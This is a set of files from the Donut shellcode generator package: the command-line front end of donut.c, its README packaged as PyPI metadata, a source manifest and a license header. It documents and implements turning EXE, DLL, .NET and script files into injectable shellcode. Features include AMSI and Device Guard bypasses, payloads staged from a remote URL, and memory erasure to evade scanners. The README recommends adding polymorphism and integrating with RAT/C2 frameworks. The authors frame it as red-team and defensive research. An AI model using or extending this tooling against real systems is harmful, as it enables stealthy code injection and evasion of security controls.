1075 | EXPORT_FUNC | |
1076 | int DonutDelete(PDONUT_CONFIG c) { | |
1077 | ||
1078 | DPRINT("Entering."); | |
1079 | if(c == NULL) { | |
1080 | return DONUT_ERROR_INVALID_PARAMETER; | |
1081 | } | |
1082 | // free module | |
1083 | if(c->mod != NULL) { | |
1084 | free(c->mod); | |
1085 | c->mod = NULL; | |
1086 | } | |
1087 | // free instance | |
1088 | if(c->inst != NULL) { | |
1089 | free(c->inst); | |
1090 | c->inst = NULL; | |
1091 | } | |
1092 | // free payload | |
1093 | if(c->pic != NULL) { | |
1094 | free(c->pic); | |
1095 | c->pic = NULL; | |
1096 | } | |
1097 | DPRINT("Leaving."); | |
1098 | return DONUT_ERROR_SUCCESS; | |
1099 | } | |
1100 | ||
1101 | // define when building an executable | |
1102 | #ifdef DONUT_EXE | |
1103 | ||
1104 | const char *err2str(int err) { | |
1105 | static const char *str="N/A"; | |
1106 | ||
1107 | switch(err) { | |
1108 | case DONUT_ERROR_SUCCESS: | |
1109 | str = "No error"; | |
1110 | break; | |
1111 | case DONUT_ERROR_FILE_NOT_FOUND: | |
1112 | str = "File not found"; | |
1113 | break; | |
1114 | case DONUT_ERROR_FILE_EMPTY: | |
1115 | str = "File is empty"; | |
1116 | break; | |
1117 | case DONUT_ERROR_FILE_ACCESS: | |
1118 | str = "Cannot open file"; | |
1119 | break; | |
1120 | case DONUT_ERROR_FILE_INVALID: | |
1121 | str = "File is invalid"; | |
1122 | break; | |
1123 | case DONUT_ERROR_NET_PARAMS: | |
1124 | str = "File is a .NET DLL. Donut requires a class and method"; | |
1125 | break; | |
1126 | case DONUT_ERROR_NO_MEMORY: | |
1127 | str = "No memory available"; | |
1128 | break; | |
1129 | case DONUT_ERROR_INVALID_ARCH: | |
1130 | str = "Invalid architecture specified"; | |
1131 | break; | |
1132 | case DONUT_ERROR_INVALID_URL: | |
1133 | str = "Invalid URL"; | |
1134 | break; | |
1135 | case DONUT_ERROR_URL_LENGTH: | |
1136 | str = "Invalid URL length"; | |
1137 | break; | |
1138 | case DONUT_ERROR_INVALID_PARAMETER: | |
1139 | str = "Invalid parameter"; | |
1140 | break; | |
1141 | case DONUT_ERROR_RANDOM: | |
1142 | str = "Error generating random values"; | |
1143 | break; | |
1144 | case DONUT_ERROR_DLL_FUNCTION: | |
1145 | str = "Unable to locate DLL function provided. Names are case sensitive"; | |
1146 | break; | |
1147 | case DONUT_ERROR_ARCH_MISMATCH: | |
1148 | str = "Target architecture cannot support selected DLL/EXE file"; | |
1149 | break; | |
1150 | case DONUT_ERROR_DLL_PARAM: | |
1151 | str = "You've supplied parameters for an unmanaged DLL. Donut also requires a DLL function"; | |
1152 | break; | |
1153 | case DONUT_ERROR_BYPASS_INVALID: | |
1154 | str = "Invalid bypass option specified"; | |
1155 | break; | |
1156 | } | |
1157 | return str; | |
1158 | } | |
1159 | ||
1160 | static char* get_param (int argc, char *argv[], int *i) { | |
1161 | int n = *i; | |
1162 | if (argv[n][2] != 0) { | |
1163 | return &argv[n][2]; | |
1164 | } | |
1165 | if ((n+1) < argc) { | |
1166 | *i = n + 1; | |
1167 | return argv[n+1]; | |
1168 | } | |
1169 | printf(" [ %c%c requires parameter\n", argv[n][0], argv[n][1]); | |
1170 | exit (0); | |
1171 | } | |
1172 | ||
1173 | static void usage (void) { | |
1174 | printf(" usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>\n\n"); | |
1175 | ||
1176 | printf(" -MODULE OPTIONS-\n\n"); | |
1177 | printf(" -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.\n"); | |
1178 | printf(" -u <URL> HTTP server that will host the donut module.\n\n"); | |
1179 | ||
1180 | printf(" -PIC/SHELLCODE OPTIONS-\n\n"); | |
1181 | printf(" -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).\n"); | |
1182 | printf(" -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)\n"); | |
1183 | printf(" -o <payload> Output file. Default is \"payload.bin\"\n\n"); | |
1184 | ||
1185 | printf(" -DOTNET OPTIONS-\n\n"); | |
1186 | printf(" -c <namespace.class> Optional class name. (required for .NET DLL)\n"); | |
1187 | printf(" -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)\n"); | |
1188 | printf(" -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.\n"); | |
1189 | printf(" -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.\n"); | |
1190 | printf(" -d <name> AppDomain name to create for .NET. Randomly generated by default.\n\n"); | |
1191 | ||
1192 | printf(" examples:\n\n"); | |
1193 | printf(" donut -f c2.dll\n"); | |
1194 | printf(" donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll\n"); | |
1195 | printf(" donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/\n"); | |
1196 | ||
1197 | exit (0); | |
1198 | } | |
1199 | ||
1200 | int main(int argc, char *argv[]) { | |
1201 | DONUT_CONFIG c; | |
1202 | char opt; | |
1203 | int i, err; | |
1204 | FILE *fd; | |
1205 | char *mod_type, *payload="payload.bin", | |
1206 | *arch_str[3] = { "x86", "AMD64", "x86+AMD64" }; | |
1207 | char *inst_type[2]= { "PIC", "URL" }; | |
1208 | ||
1209 | printf("\n"); | |
1210 | printf(" [ Donut shellcode generator v0.9.2\n"); | |
1211 | printf(" [ Copyright (c) 2019 TheWover, Odzhan\n\n"); | |
1212 | ||
1213 | // zero initialize configuration | |
1214 | memset(&c, 0, sizeof(c)); | |
1215 | ||
1216 | // default type is position independent code for dual-mode (x86 + amd64) | |
1217 | c.inst_type = DONUT_INSTANCE_PIC; | |
1218 | c.arch = DONUT_ARCH_X84; | |
1219 | c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails | |
1220 | ||
1221 | // parse arguments | |
1222 | for(i=1; i<argc; i++) { | |
1223 | // switch? | |
1224 | if(argv[i][0] != '-' && argv[i][0] != '/') { | |
1225 | usage(); | |
1226 | } | |
1227 | opt = argv[i][1]; | |
1228 | ||
1229 | switch(opt) { | |
1230 | // target cpu architecture | |
1231 | case 'a': | |
1232 | c.arch = atoi(get_param(argc, argv, &i)); | |
1233 | break; | |
1234 | // bypass options | |
1235 | case 'b': | |
1236 | c.bypass = atoi(get_param(argc, argv, &i)); | |
1237 | break; | |
1238 | // name of domain to use for .NET assembly | |
1239 | case 'd': | |
1240 | strncpy(c.domain, get_param(argc, argv, &i), DONUT_MAX_NAME - 1); | |
1241 | break; | |
1242 | // EXE/DLL/VBS/JS/XSL file to embed in shellcode | |
1243 | case 'f': | |
1244 | strncpy(c.file, get_param(argc, argv, &i), DONUT_MAX_NAME - 1); | |
1245 | break; | |
1246 | // runtime version to use for .NET DLL / EXE | |
1247 | case 'r': | |
1248 | strncpy(c.runtime, get_param(argc, argv, &i), DONUT_MAX_NAME - 1); | |
1249 | break; | |
1250 | // URL of remote module | |
1251 | case 'u': { | |
1252 | strncpy(c.url, get_param(argc, argv, &i), DONUT_MAX_URL - 2); | |
1253 | c.inst_type = DONUT_INSTANCE_URL; | |
1254 | break; | |
1255 | } | |
1256 | // class of .NET assembly | |
1257 | case 'c': | |
1258 | strncpy(c.cls, get_param(argc, argv, &i), DONUT_MAX_NAME - 1); | |
1259 | break; | |
1260 | // method of .NET assembly | |
1261 | case 'm': | |
1262 | strncpy(c.method, get_param(argc, argv, &i), DONUT_MAX_NAME - 1); | |
1263 | break; | |
1264 | // output file for payload | |
1265 | case 'o': | |
1266 | payload = get_param(argc, argv, &i); | |
1267 | break; | |
1268 | // parameters to method or DLL function | |
1269 | case 'p': | |
1270 | strncpy(c.param, get_param(argc, argv, &i), sizeof(c.param) - 1); | |
1271 | break; | |
1272 | default: | |
1273 | usage(); | |
1274 | break; | |
1275 | } | |
1276 | } | |
1277 | ||
1278 | // no file? show usage and exit | |
1279 | if(c.file[0] == 0) { | |
1280 | usage(); | |
1281 | } | |
1282 | ||
1283 | // generate payload from configuration | |
1284 | err = DonutCreate(&c); | |
1285 | ||
1286 | if(err != DONUT_ERROR_SUCCESS) { | |
1287 | printf(" [ Error : %s\n", err2str(err)); | |
1288 | return 0; | |
1289 | } | |
1290 | ||
1291 | switch(c.mod_type) { | |
1292 | case DONUT_MODULE_DLL: | |
1293 | mod_type = "DLL"; | |
1294 | break; | |
1295 | case DONUT_MODULE_EXE: | |
1296 | mod_type = "EXE"; | |
1297 | break; | |
1298 | case DONUT_MODULE_NET_DLL: | |
1299 | mod_type = ".NET DLL"; | |
1300 | break; | |
1301 | case DONUT_MODULE_NET_EXE: | |
1302 | mod_type = ".NET EXE"; | |
1303 | break; | |
1304 | case DONUT_MODULE_VBS: | |
1305 | mod_type = "VBScript"; | |
1306 | break; | |
1307 | case DONUT_MODULE_JS: | |
1308 | mod_type = "JScript"; | |
1309 | break; | |
1310 | case DONUT_MODULE_XSL: | |
1311 | mod_type = "XSL"; | |
1312 | break; | |
1313 | default: | |
1314 | mod_type = "Unrecognized"; | |
1315 | break; | |
1316 | } | |
1317 | printf(" [ Instance type : %s\n", inst_type[c.inst_type - 1]); | |
1318 | printf(" [ Module file : \"%s\"\n", c.file ); | |
1319 | printf(" [ File type : %s\n", mod_type); | |
1320 | ||
1321 | // if this is a .NET DLL, display the class and method | |
1322 | if(c.mod_type == DONUT_MODULE_NET_DLL) { | |
1323 | printf(" [ Class : %s\n", c.cls ); | |
1324 | printf(" [ Method : %s\n", c.method); | |
1325 | } else | |
1326 | if(c.mod_type == DONUT_MODULE_DLL) { | |
1327 | printf(" [ Function : %s\n", | |
1328 | c.method[0] != 0 ? c.method : "DllMain"); | |
1329 | } | |
1330 | // if parameters supplied, display them | |
1331 | if(c.param[0] != 0) { | |
1332 | printf(" [ Parameters : %s\n", c.param); | |
1333 | } | |
1334 | printf(" [ Target CPU : %s\n", arch_str[c.arch - 1]); | |
1335 | ||
1336 | if(c.inst_type == DONUT_INSTANCE_URL) { | |
1337 | printf(" [ Module name : %s\n", c.modname); | |
1338 | printf(" [ Upload to : %s\n", c.url); | |
1339 | } | |
1340 | ||
1341 | printf(" [ AMSI/WDLP : %s\n", | |
1342 | c.bypass == DONUT_BYPASS_SKIP ? "skip" : | |
1343 | c.bypass == DONUT_BYPASS_ABORT ? "abort" : "continue"); | |
1344 | ||
1345 | printf(" [ Shellcode : \"%s\"\n\n", payload); | |
1346 | fd = fopen(payload, "wb"); | |
1347 | ||
1348 | if(fd != NULL) { | |
1349 | fwrite(c.pic, sizeof(char), c.pic_len, fd); | |
1350 | fclose(fd); | |
1351 | } else { | |
1352 | printf(" [ Error opening \"%s\" for payload.\n", payload); | |
1353 | } | |
1354 | // release resources | |
1355 | DonutDelete(&c); | |
1356 | return 0; | |
1357 | } | |
1358 | #endif |
0 | Metadata-Version: 2.1 | |
1 | Name: donut-shellcode | |
2 | Version: 0.9.2 | |
3 | Summary: Donut Python C extension | |
4 | Home-page: https://github.com/TheWover/donut | |
5 | Author: TheWover, Odzhan, byt3bl33d3r | |
6 | License: UNKNOWN | |
7 | Description: # Using Donut | |
8 | ||
9 | ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut") | |
10 | ||
11 | Version: 0.9.2 *please submit issues and requests for v1.0 release* | |
12 | ||
13 | Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/ | |
14 | ||
15 | TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/ | |
16 | ||
17 | v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/ | |
18 | ||
19 | ## Introduction | |
20 | ||
21 | Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains. | |
22 | ||
23 | It can be used in several ways. | |
24 | ||
25 | ## As a Standalone Tool | |
26 | ||
27 | Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below. | |
28 | ||
29 | ``` | |
30 | ||
31 | usage: donut [options] -f <EXE/DLL/VBS/JS/XSL> | |
32 | ||
33 | -MODULE OPTIONS- | |
34 | ||
35 | -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory. | |
36 | -u <URL> HTTP server that will host the donut module. | |
37 | ||
38 | -PIC/SHELLCODE OPTIONS- | |
39 | ||
40 | -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default). | |
41 | -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default) | |
42 | -o <payload> Output file. Default is "payload.bin" | |
43 | ||
44 | -DOTNET OPTIONS- | |
45 | ||
46 | -c <namespace.class> Optional class name. (required for .NET DLL) | |
47 | -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL) | |
48 | -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon. | |
49 | -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available. | |
50 | -d <name> AppDomain name to create for .NET. Randomly generated by default. | |
51 | ||
52 | examples: | |
53 | ||
54 | donut -f c2.dll | |
55 | donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll | |
56 | donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/ | |
57 | ||
58 | ``` | |
59 | ||
60 | ### Building Donut | |
61 | ||
62 | Tags have been provided for each release version of donut that contain the compiled executables. | |
63 | ||
64 | * v0.9.2, Bear Claw: | |
65 | * v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2 | |
66 | * v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1 | |
67 | * v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9 | |
68 | ||
69 | However, you may also clone and build the source yourself using the provided makefiles. | |
70 | ||
71 | ## Building From Repository | |
72 | ||
73 | From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory. | |
74 | ||
75 | ``` | |
76 | git clone http://github.com/thewover/donut | |
77 | cd donut | |
78 | ``` | |
79 | ||
80 | ## Linux | |
81 | ||
82 | Simply run make to generate an executable, static and dynamic libraries. | |
83 | ||
84 | ``` | |
85 | make | |
86 | make clean | |
87 | make debug | |
88 | ``` | |
89 | ||
90 | ## Windows | |
91 | ||
92 | Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut: | |
93 | ||
94 | ``` | |
95 | nmake -f Makefile.msvc | |
96 | nmake clean -f Makefile.msvc | |
97 | nmake debug -f Makefile.msvc | |
98 | ``` | |
99 | ||
100 | ## As a Library | |
101 | ||
102 | donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` . | |
103 | ||
104 | ## As a Python Module | |
105 | ||
106 | Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3. | |
107 | ||
108 | ``` | |
109 | pip install . | |
110 | ``` | |
111 | ||
112 | Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory. | |
113 | ||
114 | ``` | |
115 | pip install donut-shellcode | |
116 | ``` | |
117 | ||
118 | ## As a Template - Rebuilding the shellcode | |
119 | ||
120 | *payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut. | |
121 | ||
122 | ### Microsoft Visual Studio | |
123 | ||
124 | **Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.** | |
125 | ||
126 | Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following: | |
127 | ||
128 | ``` | |
129 | nmake clean -f Makefile.msvc | |
130 | nmake -f Makefile.msvc | |
131 | ``` | |
132 | ||
133 | This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates. | |
134 | ||
135 | To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following: | |
136 | ||
137 | ``` | |
138 | nmake clean -f Makefile.msvc | |
139 | nmake x86 -f Makefile.msvc | |
140 | ``` | |
141 | ||
142 | This will save the shellcode as a C array to *payload_exe_x86.h*. | |
143 | ||
144 | ### Mingw-w64 | |
145 | ||
146 | Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following: | |
147 | ||
148 | ``` | |
149 | make clean -f Makefile.mingw | |
150 | make -f Makefile.mingw | |
151 | ``` | |
152 | ||
153 | Once you've recompiled for all architectures, you may rebuild donut. | |
154 | ||
155 | ## Bypasses | |
156 | ||
157 | Donut includes a bypass system for AMSI and other security features. Currently we bypass: | |
158 | ||
159 | * AMSI in .NET v4.8 | |
160 | * Device Guard policy preventing dynamicly generated code from executing | |
161 | ||
162 | You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c. | |
163 | ||
164 | Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used. | |
165 | ||
166 | Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using. | |
167 | ||
168 | Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined. | |
169 | ||
170 | If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded. | |
171 | ||
172 | Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research. | |
173 | ||
174 | ### Additional features. | |
175 | ||
176 | These are left as exercises to the reader. I would personally recommend: | |
177 | ||
178 | * Add environmental keying | |
179 | * Make donut polymorphic by obfuscating *payload* every time shellcode is generated | |
180 | * Integrate donut as a module into your favorite RAT/C2 Framework | |
181 | ||
182 | ## Disclaimers | |
183 | ||
184 | * No, we will not update donut to counter signatures or detections by any AV. | |
185 | * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct. | |
186 | ||
187 | # How it works | |
188 | ||
189 | ## Procedure for Assemblies | |
190 | ||
191 | Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters. | |
192 | ||
193 | The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters). | |
194 | ||
195 | Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces | |
196 | ||
197 | For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader | |
198 | ||
199 | Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README. | |
200 | ||
201 | ## Procedure for ActiveScript/XSL | |
202 | ||
203 | The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/). | |
204 | ||
205 | ## Procedure for PE Loading | |
206 | ||
207 | The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/). | |
208 | ||
209 | ## Components | |
210 | ||
211 | Donut contains the following elements: | |
212 | ||
213 | * donut.c: The source code for the donut payload generator | |
214 | * donut.exe: The compiled payload generator as an EXE | |
215 | * donut.py: The donut payload generator as a Python script *(planned for version 1.0)* | |
216 | * donutmodule.c: The CPython wrapper for Donut. Used by the Python module. | |
217 | * setup.py: The setup file for installing Donut as a Pip Python3 module. | |
218 | * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform | |
219 | * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform | |
220 | * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project | |
221 | * payload/payload.c: Main file for the shellcode. | |
222 | * payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies. | |
223 | * payload/inmem_pe.c: In-Memory loader for EXE/DLL files. | |
224 | * payload/inmem_xml.c: In-Memory loader for XSL/XML files. | |
225 | * payload/inmem_script.c: In-Memory loader for VBScript/JScript files. | |
226 | * payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files. | |
227 | * payload/wscript.c: Supports a number of WScript methods that cscript/wscript support. | |
228 | * payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP) | |
229 | * payload/http_client.c: Downloads a module from remote staging server into memory. | |
230 | * payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB). | |
231 | * payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset. | |
232 | * payload/inject.exe: The compiled C shellcode injector | |
233 | * payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing. | |
234 | * payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible | |
235 | * payload/runsc.exe: The compiled C shellcode runner | |
236 | * payload/exe2h/exe2h.c: Source code for exe2h | |
237 | * payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file | |
238 | * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption. | |
239 | * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing. | |
240 | ||
241 | # Subprojects | |
242 | ||
243 | There are three companion projects provided with donut: | |
244 | ||
245 | * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute. | |
246 | * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string. | |
247 | * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly. | |
248 | * ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded. | |
249 | ||
250 | # Project plan | |
251 | ||
252 | * ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~ | |
253 | * Create a C# version of the generator. | |
254 | * Create a donut.py generator that uses the same command-line parameters as donut.exe. | |
255 | * Add support for HTTP proxies. | |
256 | ~~* Find ways to simplify the shellcode if possible.~~ | |
257 | * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it. | |
258 | * ~~Dynamic Calls to DLL functions.~~ | |
259 | * Handle the ProcessExit event from AppDomain using unmanaged code. | |
260 | ||
261 | Platform: UNKNOWN | |
262 | Requires-Python: >=3.0 | |
263 | Description-Content-Type: text/markdown |
0 | LICENSE | |
1 | MANIFEST.in | |
2 | Makefile | |
3 | Makefile.mingw | |
4 | Makefile.msvc | |
5 | README.md | |
6 | donut.c | |
7 | donutmodule.c | |
8 | encrypt.c | |
9 | hash.c | |
10 | setup.py | |
11 | version-release-notes.txt | |
12 | ./donut.c | |
13 | ./donutmodule.c | |
14 | ./encrypt.c | |
15 | ./hash.c | |
16 | ./DonutTest/hello.c | |
17 | ./DonutTest/testcase.c | |
18 | ./include/mmap-windows.c | |
19 | ./payload/activescript.c | |
20 | ./payload/bypass.c | |
21 | ./payload/clib.c | |
22 | ./payload/getpc.c | |
23 | ./payload/http_client.c | |
24 | ./payload/inject.c | |
25 | ./payload/inmem_dotnet.c | |
26 | ./payload/inmem_pe.c | |
27 | ./payload/inmem_script.c | |
28 | ./payload/inmem_xsl.c | |
29 | ./payload/payload.c | |
30 | ./payload/peb.c | |
31 | ./payload/runsc.c | |
32 | ./payload/wscript.c | |
33 | ./payload/exe2h/exe2h.c | |
34 | ./payload/exe2h/mmap-windows.c | |
35 | ./payload/test/api_test.c | |
36 | ./payload/test/call_api_dll.c | |
37 | ./payload/test/hello.c | |
38 | docs/2019-08-21-Python_Extension.md | |
39 | docs/2019-5-31-Apple-Fritter.md | |
40 | docs/2019-5-9-Introducing-Donut.md | |
41 | docs/api.html | |
42 | docs/api.md | |
43 | donut_shellcode.egg-info/PKG-INFO | |
44 | donut_shellcode.egg-info/SOURCES.txt | |
45 | donut_shellcode.egg-info/dependency_links.txt | |
46 | donut_shellcode.egg-info/top_level.txt | |
47 | donut_shellcode.egg-info/zip-safe | |
48 | include/donut.h | |
49 | include/encrypt.h | |
50 | include/hash.h | |
51 | include/mmap-windows.c | |
52 | include/mmap.h | |
53 | include/pe.h | |
54 | include/poppack.h | |
55 | include/pshpack1.h | |
56 | include/pshpack2.h | |
57 | include/pshpack4.h | |
58 | include/pshpack8.h | |
59 | include/wintypes.h | |
60 | lib/donut.h | |
61 | payload/Makefile.mingw | |
62 | payload/Makefile.msvc | |
63 | payload/activescript.c | |
64 | payload/activescript.h | |
65 | payload/amsi.h | |
66 | payload/bypass.c | |
67 | payload/call_api.asm | |
68 | payload/call_api_bin.h | |
69 | payload/clib.c | |
70 | payload/clr.h | |
71 | payload/getpc.c | |
72 | payload/http_client.c | |
73 | payload/inject.c | |
74 | payload/inmem_dotnet.c | |
75 | payload/inmem_pe.c | |
76 | payload/inmem_script.c | |
77 | payload/inmem_xsl.c | |
78 | payload/order.txt | |
79 | payload/payload.c | |
80 | payload/payload.h | |
81 | payload/payload_exe_x64.h | |
82 | payload/payload_exe_x86.h | |
83 | payload/peb.c | |
84 | payload/peb.h | |
85 | payload/runsc.c | |
86 | payload/winapi.h | |
87 | payload/wscript.c | |
88 | payload/wscript.h | |
89 | payload/xmldom.h | |
90 | payload/exe2h/Makefile | |
91 | payload/exe2h/Makefile.mingw | |
92 | payload/exe2h/Makefile.msvc | |
93 | payload/exe2h/exe2h.c | |
94 | payload/exe2h/exe2h.obj | |
95 | payload/exe2h/mmap-windows.c | |
96 | payload/exe2h/mmap-windows.obj | |
97 | payload/exe2h/mmap.h | |
98 | payload/test/api_test.c | |
99 | payload/test/call_api_dll.c | |
100 | payload/test/hello.c | |
101 | payload/test/hello.cs | |
102 | payload/test/rdt.cpp⏎ |
0 | donut |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Python C Extension by @byt3bl33d3r | |
6 | ||
7 | Redistribution and use in source and binary forms, with or without | |
8 | modification, are permitted provided that the following conditions are met: | |
9 | ||
10 | * Redistributions of source code must retain the above copyright notice, this | |
11 | list of conditions and the following disclaimer. | |
12 | ||
13 | * Redistributions in binary form must reproduce the above copyright notice, | |
14 | this list of conditions and the following disclaimer in the documentation | |
15 | and/or other materials provided with the distribution. | |
16 | ||
17 | * Neither the name of the copyright holder nor the names of its | |
18 | contributors may be used to endorse or promote products derived from | |
19 | this software without specific prior written permission. | |
20 | ||
21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
